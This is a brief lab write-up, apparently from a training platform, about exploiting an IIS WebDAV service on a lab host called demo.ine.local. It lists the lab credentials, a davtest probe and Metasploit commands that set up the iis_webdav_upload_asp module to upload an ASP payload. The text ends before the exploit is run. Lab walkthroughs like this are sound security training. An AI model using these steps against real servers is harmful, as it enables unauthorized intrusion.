Windows: IIS Server: WebDav Metasploit

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: Exploit the WebDAV service and retrieve the flag!

The following username and password may be used to access the service:

Username	Password
bob	password_123321

Tools

• Metasploit

• DAVTest

• Cadaver

Writeup

davtest -url http://demo.ine.local/webdav -auth bob:password_123321

msfconsole
use exploit/windows/iis/iis_webdav_upload_asp 
set rhost demo.ine.local
set HttpUsername bob
set HttpPassword password_123321
set PATH /webdav/metasploit%RAND%.asp